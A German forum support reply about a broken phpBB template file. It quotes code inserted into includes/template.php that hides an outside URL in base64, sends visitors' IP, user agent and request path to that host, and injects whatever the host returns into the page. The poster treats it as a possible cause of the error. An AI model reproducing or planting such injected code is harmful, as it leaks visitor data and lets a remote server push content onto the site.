Hallo,
In dem verlinkten Code(pastebin) hast du in der Zeile 231-257 irgendwas eingebaut. Das hier ist der besagte Code
Code: Alles auswählen
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRFL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
Die Stelle bevor dieser Code zu sehen ist, sieht in dem Originall so aus
if ($filename = $this->_tpl_load($handle))
{
($include_once) ? include_once($filename) : include($filename);
}
else
{
eval(' ?>' . $this->compiled_code[$handle] . '<?php ');
}
return true;
}
bei dir sieht es allerdings so aus
if ($filename = $this->_tpl_load($handle))
{
($include_once) ? include_once($filename) : include($filename);
}
else
{
eval(' ?><?php
Merkst du es? Die Zeile 230 von dir hat das hier
eval(' ?><?php
die Hälfte davon fehlt und die fehlende Hälfte ist erst nach diesem besagten Code wo du eingebaut hast wieder zu sehen, siehe Zeile 258-262
?>' . $this->compiled_code[$handle] . '<?php ');
}
return true;
}
Du hast da die Zeile aus welchem Grund auch immer geteilt und den besagten Code eingefügt. Probiere das mal Testweise aus, ob evtl. der Fehler daher kommt.
Ich denke du weißt jetzt was du probieren sollst und das fehlende einträgst, ausserdem das von dir aus welchen Gründen auch immer "falsch" geteilte was unterhalb von diesem zugefügten Code zu viel ist dort natürlich auch wieder entfernst. Ich denke du weißt was ich meine und hast mich verstanden.
Bevor du das machst, kopiere dir aber die bemeckerte Datei
includes/template.php
auf dein Rechner, so hast du deine Datei, falls dir das Abändern von dem Code wo ich dir sagte, doch nichts gebracht hat(sicher ist sicher).
Danach Cache leeren usw. nicht vergessen und erneut probieren.
Grüße